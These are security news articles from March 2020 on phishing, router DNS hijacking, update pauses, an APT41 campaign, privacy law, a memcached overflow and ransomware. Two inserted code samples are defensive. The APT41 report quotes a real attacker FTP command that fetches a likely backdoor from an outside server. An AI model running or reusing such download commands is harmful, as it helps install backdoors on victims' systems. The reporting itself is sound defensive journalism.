“Last year, TAG discovered that a single threat actor was capitalizing on five zero-day vulnerabilities. Finding this many zero-day exploits from the same actor in a relatively short time frame is rare. The exploits were delivered via compromised legitimate websites (e.g. watering hole attacks), links to malicious websites, and email attachments in limited spear phishing campaigns. The majority of targets we observed were from North Korea or individuals who worked on North Korea-related issues,” Toni Gidwani, security engineering manager for TAG, said in a post.

The flaws that this attacker was exploiting included bugs in Internet Explorer, Chrome, Android, and Windows, all of which are prime targets for attackers as they’re all widely deployed. This kind of activity is the hallmark of a state-backed adversary, one with extensive resources, financial backing, technical talent, and time to scope targets and develop tools and exploits. Attackers at that level tend to focus on specific, rather than random, targets and employ a variety of tactics, from the highly sophisticated to the banal.

If attacks exploiting zero days are at the top of that pyramid, phishing would be toward the bottom. But that doesn’t mean phishing is not effective; it absolutely is. And that means attackers will continue to use it, even high-level groups. Google’s TAG also spends a considerable amount of time researching phishing attacks and developing new mitigations and defenses against them. Google has several levels of defense against phishing campaigns, especially those that come from state actors. For the last few years the company has had a system that sends people a warning if Google detects a government-backed phishing or malware attack on their accounts. Google also created its Advanced Protection Program a few years ago, which provides a high level of defense against many attacks, including phishing, with the use of hardware security keys for two-factor authentication.

“In 2019, we sent almost 40,000 warnings, a nearly 25 percent drop from 2018. One reason for this decline is that our new protections are working—attackers' efforts have been slowed down and they’re more deliberate in their attempts, meaning attempts are happening less frequently as attackers adapt,” Gidwani said.

“In 2019, one in five accounts that received a warning was targeted multiple times by attackers. If at first the attacker does not succeed, they’ll try again using a different lure, different account, or trying to compromise an associate of their target. We’ve yet to see people successfully phished if they participate in Google’s Advanced Protection Program (APP), even if they are repeatedly targeted.”

<![CDATA[Attackers Target Home Routers With DNS-Changing Hack]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/attackers-target-home-routers-with-dns-changing-hack https://duo.com/decipher/attackers-target-home-routers-with-dns-changing-hack Thu, 26 Mar 2020 00:00:00 -0400

Attackers are nothing if not opportunistic, and a recently discovered campaign that targets home-office wireless routers and redirects victims to malicious sites that install an information stealer illustrates perfectly just how cynical they can be.

The attacks take advantage of the uncertainty and anxiety surrounding the COVID-19 outbreak to entice victims into installing an app that is disguised as a source of information about the virus from the World Health Organization. The app does nothing of the sort, of course, and instead installs the Oski malware, which steals a wide range of sensitive system and personal information and sends it to a remote server. The theme of cybercrime groups and phishing gangs taking advantage of trending topics or world events is an old one and each new crisis brings out the basest instincts in the attacker population, but this is not a simple phishing campaign. Researchers at Bitdefender uncovered this campaign and found that it has been targeting some models of Linksys routers, and possibly others.

This attack chain begins with an adversary compromising the victim’s home router, likely by brute-forcing the admin credentials. For many models of home wireless routers, the default credentials are widely known and rarely ever changed by individual users, so they make for easy pickings. Once the adversary has a foothold on the router, he changes the default DNS settings to point to servers he controls. This effectively gives the attacker control over what sites the victims will see, regardless of what sites they’re trying to visit. In this case, the attackers redirect victims to a site they control that presents them with the page urging them to install the malicious virus-tracking app. The attack targets a relatively small list of domains, but some of them are highly trafficked, including disney.com and an Amazon subdomain.

This campaign is especially troubling given the number of people who are now working remotely and relying on their home Internet connections.

“What’s interesting is that, by changing the DNS settings on the router, users would actually believe they’ve landed on a legitimate webpage, except that it’s served from a different IP address. For example, when users type “example.com”, instead of the webpage being served from a legitimate IP address, it would be served from an attacker-controlled IP that's resolved by the malicious DNS settings,” Liviu Arsene of Bitdefender said in an analysis of the attack campaign.

“If the attacker-controlled webpage is a spot-on facsimile, users would actually believe they’ve landed on a legitimate webpage, judging from the domain name in the browser’s address bar.”
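The mechanism Arsene describes gives defenders two cheap signals: the router's configured upstream resolvers no longer match what the owner or ISP set, and familiar domains resolve to addresses that disagree with an independent, trusted resolver. The following script is an added example for this article, not Bitdefender's code or any tool from the campaign analysis; the router snapshot, the resolution results and the "expected" resolver list are constructed sample data using documentation IP ranges, and the field names (`dns`, the `Finding` kinds) are assumptions of the example.

```python
"""Defender-side audit for router DNS hijacking (added example, constructed data)."""
from dataclasses import dataclass
import ipaddress


@dataclass
class Finding:
    kind: str     # "resolver_changed" or "resolution_mismatch"
    subject: str  # the resolver address or the domain name concerned
    detail: str


def unexpected_resolvers(configured, expected):
    """Return a Finding for every configured resolver that is not in the allowlist.

    A hijacked router points clients at attacker-run resolvers, so any address
    outside the owner's known-good set deserves a look.
    """
    allow = {ipaddress.ip_address(a) for a in expected}
    findings = []
    for entry in configured:
        try:
            ip = ipaddress.ip_address(entry)
        except ValueError:
            findings.append(Finding("resolver_changed", entry, "not a valid IP address"))
            continue
        if ip not in allow:
            findings.append(Finding("resolver_changed", str(ip), "resolver not in allowlist"))
    return findings


def resolution_mismatches(router_answers, trusted_answers):
    """Compare A records obtained via the router with those from a trusted resolver.

    CDNs legitimately hand out different subsets of addresses, so a domain is
    only flagged when the two answer sets share no address at all.
    """
    findings = []
    for domain, seen in router_answers.items():
        trusted = set(trusted_answers.get(domain, ()))
        if not trusted:
            continue  # nothing to compare against
        if not set(seen) & trusted:
            findings.append(Finding(
                "resolution_mismatch", domain,
                f"router resolver says {sorted(seen)}, trusted resolver says {sorted(trusted)}"))
    return findings


def audit(router_cfg, expected_resolvers, router_answers, trusted_answers):
    """Run both checks and return the combined list of findings."""
    return (unexpected_resolvers(router_cfg["dns"], expected_resolvers)
            + resolution_mismatches(router_answers, trusted_answers))


# Constructed sample data (documentation ranges; not real observations).
SAMPLE_ROUTER_CFG = {"dns": ["203.0.113.10", "203.0.113.11"]}   # resolvers as found on the router
EXPECTED_RESOLVERS = ["192.0.2.53", "192.0.2.54"]                # assumed ISP-provided resolvers
SAMPLE_ROUTER_ANSWERS = {"example.com": ["203.0.113.99"],        # answers via the router
                         "example.net": ["198.51.100.7"]}
TRUSTED_ANSWERS = {"example.com": ["198.51.100.20", "198.51.100.21"],  # answers via a trusted resolver
                   "example.net": ["198.51.100.7"]}

if __name__ == "__main__":
    for finding in audit(SAMPLE_ROUTER_CFG, EXPECTED_RESOLVERS,
                         SAMPLE_ROUTER_ANSWERS, TRUSTED_ANSWERS):
        print(f"[{finding.kind}] {finding.subject}: {finding.detail}")
```

In practice the two answer dictionaries would be filled by querying the router's resolver and an independent one (for instance with the `dig` tool) for a short list of frequently visited domains; the point of the intersection test is that a changed resolver is the strong signal, while resolution differences alone need the allowlist context to avoid false positives from CDN rotation.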

To add extra layers of legitimacy to the attack, the adversaries also use Bitbucket, a legitimate hosting service, to deliver the malicious payload and cloak the URL by using TinyURL. All of these tricks are designed to take the victim’s attention away from any suspicion that this might be an attack and entice him into downloading the malware.

“In the final stage of the attack a malicious file packed with MPRESS is downloaded. This payload is the Oski stealer that communicates with a C&C server for uploading the stolen information,” Arsene said. “Oski is a relatively new infostealer that seems to have emerged in late 2019. Some of the features that it packs revolve around extracting browser credentials and cryptocurrency wallet passwords, and its creators even brag that it can extract credentials stored in SQL databases of various Web browsers and Windows Registry.”

The initial method of compromise for the routers isn’t certain, but the brute-force method appears to be the most likely scenario. Arsene said Bitdefender has found victims in a number of countries, but the United States, France, and Germany account for the lion’s share.

<![CDATA[Give IT a Break from Software Updates]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/give-it-a-break-from-software-updates https://duo.com/decipher/give-it-a-break-from-software-updates Thu, 26 Mar 2020 00:00:00 -0400

Microsoft said it will pause non-security Windows updates beginning in May as part of its plan to reduce the update pressure on IT and security teams, as they are busy keeping organizations operational during the COVID-19 pandemic. Other software companies are adjusting their release schedules, recognizing that IT and security teams are currently stretched thin.

"We have been evaluating the public health situation, and we understand this is impacting our customers," Microsoft wrote in a post to the Windows 10 messaging center. "In response to these challenges we are prioritizing our focus on security updates."

Organizations around the world are instructing employees to work from home in order to keep them from getting sick or spreading the disease to others, but this kind of a rapid shift to a remote workplace requires a tremendous amount of effort and speed. IT has had to field an increased volume of support requests—beginning with procuring the equipment, setting up users with new hardware and software, establishing new processes for users to follow, and assisting users who have trouble with the new procedures.

“Right now, we need to focus on keeping the lights on,” said Dave Lewis, an advisory CISO at Duo. “You do not want to mess with anything.”

Every operating system update and patch has the potential to cause unexpected issues for users and the vast amount of software across the Windows ecosystem, said Jack Mannino, the CEO of application security provider nVisium. IT and security teams have to prioritize what to work on in the current “resource-constrained and logistically challenging environment.”

“Addressing security issues and critical bug fixes without interruption ensures that we're not building up significant security and technical debt while we're in the midst of the pandemic,” Mannino said.

It doesn’t make sense to divert the attention and energies of IT and security teams away from supporting users and monitoring for potential security issues to testing and deploying software updates. Installing updates could also inadvertently introduce a problem, such as conflicts with existing software or issue with specific types of hardware, which may not be easy to fix, Lewis said.

In a situation where everything is under a lot of stress, it makes sense to not make any changes. The ramifications may go far beyond just a software change—first responders may find that an option they always use has been moved elsewhere, or renamed to look like something else—and actually cause harm.

Pause Non-Security Updates

When Microsoft said it will pause non-security updates, it was referring to the optional Windows updates, the C and D updates which are released during the third and fourth week of each month. The C and D updates generally contain non-security fixes which are officially released in the cumulative update the following month and are not intended to be distributed to all Windows machines. These optional “preview” updates “contain only non-security updates and are intended to provide visibility and testing of the planned non-security fixes” Microsoft said. The fixes in the optional updates go into the following month’s Patch Tuesday (or as Microsoft prefers to call it, Update Tuesday) release as part of the cumulative update. The point of these updates is to give IT teams the opportunity to test the update earlier and give feedback before they are officially released.

Microsoft released a D update in March for Windows 10 1903 and Windows 10 1909. The C and D updates for April are still expected to happen on schedule.

The security updates, or the B updates, are released on the second Tuesday of the month and will continue on schedule. Microsoft will also continue to issue out-of-band security updates as needed. That should come as a relief for security teams, as Microsoft this week disclosed two zero-day vulnerabilities in the Adobe Type Manager Library, which Windows uses to render different types of PostScript Type 1 fonts. Microsoft has seen “limited, targeted attacks” exploiting the vulnerability. The fix may not be part of the next Patch Tuesday (“Update” Tuesday) release in April.

"If it is catastrophically necessary, you do it," Lewis said. "If there is an Internet worm going around, you patch it."

A Temporary Pause

Earlier this month, Google’s Chrome team said it would temporarily pause the release of Chrome version 81 and focus their efforts on improving the security and stability of the current version (version 80) of the web browser. Instead of March 17, the new version of the web browser is now expected April 7. Version 82 has been cancelled and its features rolled into version 83, whose release date has been bumped up three weeks, to mid-May.

Following Google’s lead, Microsoft suspended future releases of its Edge web browser. Edge is currently on version 80—and will remain on this version for the foreseeable future and keep version 81 in beta. Microsoft will keep rolling out security updates for version 80.

"We are making this change to be consistent with the Chromium project, which recently announced a similar pause due to adjusted schedules, and out of a desire to minimize additional impact to web developers and organizations that are similarly impacted," Microsoft said at the time.

Apple has not said if it will be making any changes to Safari’s release schedule, although it just rolled out a hefty security and feature update for macOS Catalina, Safari, iTunes for Windows, iOS, iPadOS, macOS, watchOS, and tvOS. Mozilla has also not said if it plans to delay the release of the next version of Firefox, currently scheduled for April 7.

Challenging Times

While delaying updates and new releases would ease the current workload for IT, the decision to do so may also reflect the challenges the developers themselves were facing. Paul Kinlan, the lead for the developer relations team at Google, noted on Twitter that there were several reasons behind the original decision to not release Chrome version 81, including “lower productivity, worry about asking ecosystem to change, being able to respond quickly when there's an issue.”

Many companies are struggling with productivity and staffing. “Microsoft will be using the resources they have and focus on critical security updates such as zero day vulnerabilities,” said Ray Kelly, principal solutions architect and alliances at WhiteHat Security. “It’s a wise decision at the cost of a potential large update after they are staffed back up.”

<![CDATA[APT41 Campaign Targeted Companies in 20 Countries]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/attack-campaign-by-apt41-targeted-companies-in-20-countries https://duo.com/decipher/attack-campaign-by-apt41-targeted-companies-in-20-countries Wed, 25 Mar 2020 00:00:00 -0400

One of the more active Chinese cyberespionage and cybercrime groups recently conducted a widespread attack campaign that targeted companies in banking, defense, technology, and other sectors in at least 20 countries over the last three months.

APT41 began exploiting a handful of publicly known vulnerabilities in widely deployed enterprise and SMB products at the beginning of 2020, starting with a remote code execution flaw in the Citrix Application Delivery Controller and Citrix Gateway devices (CVE-2019-19781), according to researchers at FireEye who have tracked the campaign. The attackers later moved on to exploits for vulnerabilities in Cisco routers and Zoho ManageEngine Desktop Central, all of which had been publicly disclosed prior to the group’s attacks. The campaign targeted organizations around the world, including some in Australia, Canada, France, Japan, the UK and the United States.

This is somewhat unusual activity for APT41, which has an extensive arsenal of internally developed tools and exploits, but attack groups will generally take the path of least resistance and using public exploits qualifies. Last year, for example, FireEye discovered a separate intrusion by APT41 that involved the use of a publicly available exploit for a vulnerability in the Atlassian Confluence application. As in the 2020 campaign, that intrusion involved an initial compromise and then the use of second-stage payloads and backdoors.

The campaign that FireEye discovered this year began toward the end of January and involved the targeting of the Citrix flaw. Those intrusions began about 10 days after some proof-of-concept exploit code for the vulnerability was released.

“The initial CVE-2019-19781 exploitation activity on January 20 and January 21, 2020, involved execution of the command ‘file /bin/pwd’, which may have achieved two objectives for APT41. First, it would confirm whether the system was vulnerable and the mitigation wasn’t applied. Second, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step,” FireEye researchers said in a report on the campaign.

“Starting on February 1, 2020, APT41 moved to using CVE-2019-19781 exploit payloads that initiate a download via the File Transfer Protocol (FTP). Specifically, APT41 executed the command ‘/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd’, which connected to 66.42.98[.]220 over the FTP protocol, logged in to the FTP server with a username of ‘test’ and a password that we have redacted, and then downloaded an unknown payload named ‘bsd’ (which was likely a backdoor).”


Interestingly, the APT41 activity against Citrix devices essentially stopped from Feb. 2 through Feb. 19, which coincides with the beginning of the quarantine process in China for the COVID-19 virus. The activity picked up again around Feb. 24, but then the attackers began exploiting a known flaw in the Cisco RV320 routers. The FireEye researchers weren’t able to identify the specific exploit that APT41 used against the routers, but noted that there is a public Metasploit module that includes an exploit for the vulnerability.

Shortly after that attack, the APT41 team began focusing on a zero-day vulnerability in a Zoho application at a number of different organizations.

“Beginning on March 8, FireEye observed APT41 use 91.208.184[.]78 to attempt to exploit the Zoho ManageEngine vulnerability at more than a dozen FireEye customers, which resulted in the compromise of at least five separate customers. FireEye observed two separate variations of how the payloads (install.bat and storesyncsvc.dll) were deployed,” the FireEye report says.

“In the first variation the CVE-2020-10189 exploit was used to directly upload ‘logger.zip’, a simple Java based program, which contained a set of commands to use PowerShell to download and execute install.bat and storesyncsvc.dll.”

In one variation of that attack, APT41 likely used a public PoC exploit as the basis for their operation, while in another the team used a Microsoft tool to download and run a tool from a server known to be operated by APT41. In both cases, the attackers installed a trial version of the Cobalt Strike Beacon threat emulation tool. The attackers then used that tool to download a backdoor.

“It is notable that we have only seen these exploitation attempts leverage publicly available malware such as Cobalt Strike and Meterpreter. While these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance,” FireEye’s report says.

<![CDATA[California, NY Consumer Privacy Laws Protect Data from Misuse]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/california-ny-consumer-privacy-laws-protect-data-from-misuse https://duo.com/decipher/california-ny-consumer-privacy-laws-protect-data-from-misuse Wed, 25 Mar 2020 00:00:00 -0400

Organizations collecting and maintaining personal information about California and New York residents should be paying attention to what is happening with the states’ consumer privacy laws.

The data security elements of New York’s Stop Hacks and Improve Electronic Data Security Act went into effect on March 21. Ten days earlier, the California Attorney General released a second modification of the proposed regulations to implement the California Consumer Protection Act (CCPA). Both of these laws strengthen consumer privacy by focusing on how organizations use and protect the personal data they collect.

New York’s SHIELD Act, which was signed into law last July, broadens the scope of consumer privacy by requiring organizations to protect the information they collect and by expanding the types of data which are subject to the data breach notification law. The law also broadened the definition of a data breach to include unauthorized access to private information. Most of the law’s provisions took effect on Oct. 23, 2019, and the data security portion was the only one left.

Often compared to the European Union’s General Data Protection Regulation (GDPR), CCPA gives consumers control over what data is collected, processed, shared, or sold by companies doing business in California. As a state law, CCPA’s rules protecting consumers from having their personal data used improperly apply only to California, but the sheer size of the state’s economy and number of residents means most organizations have to comply. CCPA went into effect Jan. 1 and is currently the strongest consumer privacy law on the books among the fifty states (absent a federal law).

Like CCPA, the SHIELD Act’s reach extends beyond New York’s borders because it applies to any organization with any information about any New York resident. It doesn’t require the business to operate in New York.

SHIELD’s Stipulations

The SHIELD Act established minimum security requirements for all organizations (“persons and entities”), both for-profit and non-profit, that hold protected data. This type of data includes Social Security numbers; driver’s license numbers or non-driver identification card numbers; account numbers and payment card numbers; passwords and security codes associated with financial accounts; biometric information such as fingerprints, voice prints, and retina or iris images; and usernames and email addresses, along with corresponding passwords and security questions and answers. If such data gets exposed in a data breach or some other incident, the entity has to report it to the attorney general.

Organizations possessing protected data would be considered in compliance if they implement data security practices with reasonable administrative, technical, and physical safeguards. These include having a written security program with reasonable administrative safeguards such as training employees on appropriate security procedures and selecting service providers that follow secure practices, along with technical safeguards such as regular testing and monitoring of essential controls, systems and procedures. The law requires physical safeguards such as disposing of private information and securely erasing electronic media. The SHIELD Act also requires that any entity collecting data has to have a designated employee to oversee the security program.

Small businesses—with less than $3 million in annual revenue, less than $5 million in assets, or fewer than 50 employees—will be considered in compliance if they have the same kind of administrative, technical or physical safeguards "appropriate for the size and complexity of the small business, the nature, and scope of the small business's activities, and the sensitivity of the personal information the small business collects from or about consumers."

Most entities already compliant with the Health Insurance Portability and Accountability Act (HIPAA), the Gramm-Leach-Bliley Act, or the New York Department of Financial Services cybersecurity regulations most likely already comply with the SHIELD Act, wrote Curtis A. Johnson, an attorney in cybersecurity and data privacy at law firm Bond, Schoeneck & King PLLC. There is no certification process to show that an organization is complying with the SHIELD Act. However, if there is a data breach and the investigation turns up that the organization was not compliant, the organization may face civil penalties of up to $5,000 per violation, with no cap on the total.

Current CCPA Changes

As for CCPA, the proposed regulations on how to implement the law were released in October, and the California Attorney General released a set of modifications in February. The second modifications are in response to the comments received on the February rules. While some of the changes in the second modifications are new, some reversed the changes that were introduced in the first modification.

The modifications do not change the overall structure of the proposed regulations, and there is no major change to the main requirement that businesses have to notify the consumer at the “point of collection” about what information is being collected, how it will be used, and where to find the privacy policy. There is a minor tweak in how the notification is presented, however, as businesses collecting the personal information over the telephone or in person can notify the consumer verbally. And in cases where the information is being collected for employment purposes, the business doesn’t have to provide a link to the privacy policy.

The modifications expand the types of information to include in the privacy policy. For example, the privacy policy must identify the categories of sources from which personal information is collected, and the categories have to be described in a way that consumers will understand. This is in line with the original regulations. Another change requires that businesses selling information identify the commercial purpose the data will be used for, or the business they are selling to, “in a manner that provides consumers meaningful understanding of why the information is collected or sold.”

If the business receives a request to know a consumer’s Social Security number, driver’s license number or other government-issued identification number, it does not have to disclose what it knows. However, the business still has to inform the consumer that it collected that type of information. “For example, a business shall respond that it collects ‘unique biometric data including a fingerprint scan’ without disclosing the actual fingerprint scan data.”

A business that does not collect personal information directly from consumers does not need to notify the consumer that it holds the data, but only if the business does not sell the personal data. And if a business that sells consumer data denies a consumer’s deletion request and the consumer has not already made a request to opt out of the sale, then the business must ask the consumer again whether they want to opt out.

Don’t Delay

Businesses are expected to be compliant with CCPA by July 1, when enforcement will begin. The California Attorney General is making these modifications in response to public input, and the final regulations are expected to be complete before then. However, it can be difficult for businesses making the necessary changes to be compliant with the law when the rules keep changing.

Organizations should be implementing good security hygiene, conducting thorough asset inventories, and strengthening their security practices—all of which will help meet SHIELD’s requirement to have safeguards in place—in order to avoid civil penalties under the laws. Businesses should be encrypting their data in order to comply with CCPA, according to the California Consumer Privacy Compliance Guide from IT analyst and research firm Enterprise Strategy Group. If data has been encrypted or redacted, it cannot be used by unauthorized parties, so even in the case of a breach the consumer is not harmed. Data protection applies to data at rest in storage, in transit over networks, and while in use by applications, according to the Guide.

“Organizations need to implement advanced data classification, data anonymization, data masking, encryption, security, and access controls in order to set themselves up for successful compliance,” wrote Christophe Bertrand, ESG senior analyst.

Many organizations are “only ready on the surface,” such as implementing the opt-in/opt-out mechanism for marketing materials, and have not acted on the data protection elements, Bertrand said.

A business group asked the California Attorney General to postpone enforcement of CCPA because of concerns over making the necessary changes when many employees are working remotely and adjusting to new processes. “Developing innovative business procedures to comply with brand-new legal requirements is a formidable undertaking on its own, but it is an especially tall order when there are no dedicated, on-site staff available to build and test necessary new systems and processes,” the letter said.

While the attorney general’s office has not yet responded to the request, privacy advocates pushed back, noting that organizations have had almost a full year to make the changes.

“[Industry] shouldn’t exploit the health crisis to ignore consumer requests to companies to stop selling their data,” said Justin Brookman, director of privacy and technology policy at Consumer Reports.

“Now that more consumers are working from home and relying on tech companies for crucial communications, the attorney general needs to ensure that appropriate safeguards are in place,” said Maureen Mahoney, a policy analyst at Consumer Reports.

Organizations should not expect a postponement and do what needs to be done to ensure they are complying with the law. This is not the time to be lax about compliance. In fact, with the workforce working remotely and using alternate (unfamiliar) tools, proper data management and protection is more important than ever.

As for SHIELD, “New York State has not delayed implementation in the face of the statewide and national emergencies declared as a result of the COVID-19 pandemic,” said Johnson.

<![CDATA[Buffer Overflow in Memcached Fixed]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/buffer-overflow-in-memcached-fixed https://duo.com/decipher/buffer-overflow-in-memcached-fixed Tue, 24 Mar 2020 00:00:00 -0400

The maintainers of the popular memcached open source distributed memory caching tool have quickly resolved a remote denial-of-service vulnerability that was disclosed publicly Monday, along with proof-of-concept exploit code.

The bug is caused by a buffer overflow in the memcached code, and if an attacker can supply a long enough value for the buggy parameter, the application will crash. On Monday, someone posted the details of the vulnerability and the PoC code to GitHub, which was apparently the first indication the application’s maintainers had of the issue. The bug affects versions 1.6.0 and 1.6.1.

“In line 6179, since there is no mechanism to verify the parameter's length, in this case, the length of "extlen" when calling memcpy function, It will cause buffer overflow if large value assigned to the extlen variable,” the bug disclosure says.

“We can construct a very large data packet and send it to the server running memcached 1.6.0 or 1.6.1 anonymously. After that, the program will crash because of the issue mentioned above.”
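The defect the disclosure describes is a declared length that is trusted when it reaches memcpy. The following is an added C example, not memcached's code and not the fix shipped in 1.6.2: it parses the request header and refuses the copy unless the declared extras length fits the destination buffer, agrees with the declared body length, and does not exceed the bytes actually received. The field offsets follow the memcached binary protocol header (extras length at byte 4, total body length at bytes 8 to 11); the 20-byte extras buffer, the struct and the sample packets are constructed for this illustration.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define BIN_HEADER_LEN 24   /* memcached binary protocol header size */
#define EXTRAS_MAX 20       /* fixed extras buffer; constructed size for this example */

/* Parsed view of the header fields this example needs.
 * Hypothetical struct, not memcached's own. */
struct bin_header {
    uint8_t  magic;
    uint8_t  opcode;
    uint16_t keylen;
    uint8_t  extlen;    /* declared length of the "extras" section */
    uint32_t bodylen;   /* declared total body length (extras + key + value) */
};

/* Decode the big-endian header fields from the first 24 bytes of a packet.
 * Returns 0 on success, -1 if fewer than 24 bytes are available. */
int parse_bin_header(const uint8_t *buf, size_t len, struct bin_header *h) {
    if (len < BIN_HEADER_LEN) return -1;
    h->magic   = buf[0];
    h->opcode  = buf[1];
    h->keylen  = (uint16_t)((buf[2] << 8) | buf[3]);
    h->extlen  = buf[4];
    h->bodylen = ((uint32_t)buf[8] << 24) | ((uint32_t)buf[9] << 16) |
                 ((uint32_t)buf[10] << 8) | (uint32_t)buf[11];
    return 0;
}

/* Hardened extras copy: every declared length is checked before memcpy runs.
 * Returns the number of bytes copied, or -1 when the request is rejected. */
int copy_extras_checked(const uint8_t *pkt, size_t len, uint8_t *dst, size_t dst_len) {
    struct bin_header h;
    if (parse_bin_header(pkt, len, &h) != 0) return -1;
    if (h.extlen > dst_len) return -1;                        /* would overflow dst */
    if ((uint32_t)h.extlen + h.keylen > h.bodylen) return -1;  /* header inconsistent */
    if (len - BIN_HEADER_LEN < h.extlen) return -1;            /* bytes not yet received */
    memcpy(dst, pkt + BIN_HEADER_LEN, h.extlen);
    return (int)h.extlen;
}

/* Constructed packets for the demonstration. */
/* Well-formed: extlen 4, keylen 0, bodylen 4, four extras bytes follow the header. */
static const uint8_t good_pkt[BIN_HEADER_LEN + 4] = {
    0x80, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x04, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
    0xde, 0xad, 0xbe, 0xef };
/* Oversized: extlen 0xff; an unchecked memcpy would write 255 bytes into 20. */
static const uint8_t bad_pkt[BIN_HEADER_LEN + 255] = {
    0x80, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0xff };

int demo_good(void) {       /* returns 4: copy accepted */
    uint8_t ex[EXTRAS_MAX];
    return copy_extras_checked(good_pkt, sizeof good_pkt, ex, sizeof ex);
}
int demo_bad(void) {        /* returns -1: extlen larger than the buffer */
    uint8_t ex[EXTRAS_MAX];
    return copy_extras_checked(bad_pkt, sizeof bad_pkt, ex, sizeof ex);
}
int demo_truncated(void) {  /* returns -1: only 2 of the 4 declared bytes arrived */
    uint8_t ex[EXTRAS_MAX];
    return copy_extras_checked(good_pkt, BIN_HEADER_LEN + 2, ex, sizeof ex);
}

int main(void) {
    printf("well-formed packet: %d bytes copied\n", demo_good());
    printf("oversized extlen:   %d (rejected)\n", demo_bad());
    printf("truncated packet:   %d (rejected)\n", demo_truncated());
    return 0;
}
```

The three checks are independent: the first protects the destination buffer, the second catches a header whose parts cannot add up, and the third matters for servers that parse as data streams in, since a declared length can exceed what has actually been read so far.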

Memcached has been in use for more than 15 years and is used in a number of environments. It’s designed to help web apps run faster by sharing memory and it can allocate memory from places that have too much to areas that don’t have enough.

Within a few hours of the issue surfacing on GitHub, one of the maintainers of memcached had released a new version that fixes the DoS vulnerability, version 1.6.2. The maintainer seemed none too pleased with the public disclosure of the vulnerability.

“I've been responsive to security reports (or even report them myself) and give credit happily when due for over ten years. Don't waste my good will, please,” the maintainer, Dormando, said in a comment on the bug disclosure.

<![CDATA[Insurers See Ransomware Claims More Than Double]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/insurers-see-ransomware-claims-more-than-double https://duo.com/decipher/insurers-see-ransomware-claims-more-than-double Tue, 24 Mar 2020 00:00:00 -0400

Ransomware attacks are on the rise, with one insurance company seeing the number of customer claims more than double in 2019. The spike in attacks was most evident in healthcare, professional services, and financial services.

The number of ransomware attack notifications against customers of London-based insurance company [Beazley Group](https://www.beazley.com) more than doubled in 2019 compared to 2018, Beazley Breach Response (BBR) Services, the insurer’s in-house breach response team, said in its [Beazley Breach Briefing](https://www.beazley.com/news/2020/beazley_breach_briefing_2020.html). The growth rate is also dramatic: there were 775 incidents in 2019, a 131 percent increase over 2018, compared with a 20 percent increase in 2018 over 2017 and a 9 percent increase in 2017 over 2016.

“Until four years ago reports from our policyholders of ransomware attacks were infrequent,” said the Beazley Breach Briefing. Back then, a ransomware attack typically did not also include data exfiltration, where the files were copied to a remote server. That is increasingly no longer the case. “Today, however, not only has the frequency of ransomware attacks increased substantially, but the added threat of a data breach makes them potentially much more damaging,” the report said.

More Ransomware

The figures from Beazley Breach Response Services are useful for understanding the magnitude of the ransomware problem. Many ransomware victims don’t publicly disclose that they’ve been hit by a ransomware attack, and even fewer notify law enforcement. This reticence makes it difficult to get an accurate picture of whether these attacks are becoming more common. Even when victims do report a ransomware attack publicly, they often decline to divulge the amount of ransom demanded or paid.

There is no doubt ransomware attacks are on the rise. Trend Micro reported a 10 percent increase in ransomware detections in 2019 in its Annual Threat Report 2019, and that the healthcare sector was the most targeted industry, with more than 700 providers impacted. The figures were even higher from Kaspersky, which reported a 60 percent increase in ransomware attacks in 2019 compared to 2018. Ransomware targeted 174 municipalities and 3,000 of its sub-organizations in 2019, Kaspersky said.

Government organizations were the “intended victims of nearly two-thirds of all ransomware attacks,” Barracuda said back in August.

Insights from insurers like Beazley that see ransomware infections that may not otherwise be reported help illustrate the situation. According to the Beazley Breach Briefing, the healthcare sector was hardest hit in 2019, accounting for 35 percent of attack reports. These included direct attacks against hospitals, health systems, and other covered entities, as well as attacks on IT vendors providing services to hundreds of dental and nursing home facilities. Financial companies were second most impacted, at 16 percent, followed by educational institutions at 12 percent, and professional services organizations at 9 percent, said the Beazley Breach Briefing.

The report included ransomware incidents where the customer wasn’t the actual target, but had its operations disrupted because its IT provider or other third-party entity was infected. In those cases, these attacks had a wider impact, because they affected many of the provider’s customers, not just a single victim. About 17 percent of attacks in Beazley Breach Briefing involved these third-party organizations.

"The targets of these attacks were not coincidental; criminals calculate the odds of receiving a ransom payment from an attacked MSP whose entire customer base and business could dissipate due to an attack," the Beazley Breach Briefing said.

Ransomware attacks against large and well-known organizations are more likely to be reported and talked about. But about three-fifths of the victims, or 62 percent, in Beazley’s data were small and medium-sized businesses. These are often the organizations that are frequently undercounted because they are small enough to not have to disclose the attacks.

Products and services with a large market share are likely ransomware targets, as are communication devices, smart TVs, and cloud-based security and monitoring tools, “as they have a very large attack surface,” the Briefing said.

Attackers’ Entry Points

One reason there are more attacks is that there are more ransomware strains than there used to be. The availability of ransomware strains such as Ryuk and Sodinokibi means it is easier for attackers to get started on their campaigns. Another reason is that employees are falling for phishing scams and organizations are still struggling to secure remote desktop protocol (RDP) properly. RDP allows employees to remotely access their corporate workstations and servers. However, many RDP systems can be found by scanning IP addresses, and are generally unprotected. Many organizations don’t bother assigning a password to RDP, or use a weak or compromised password, “giving a brute-force attack a high probability of success.” RDP is not always updated in a timely manner, and there are many recently discovered vulnerabilities that would allow someone unauthenticated access to the target computer.

Once in the network, the attacker can move around to infect additional systems and potentially steal information.


More and more attackers are using ransomware alongside other types of malware to steal and exfiltrate sensitive information. Criminals are also combining ransomware with other attack techniques, such as breaching the network with the TrickBot banking Trojan and then encrypting the files with ransomware, said Katherine Keefe, Beazley’s head of breach response services.

“This two-pronged attack leaves organizations not only with the debilitating impact of its critical systems and data being encrypted, but with the added risk of data being accessed or stolen,” Keefe said.

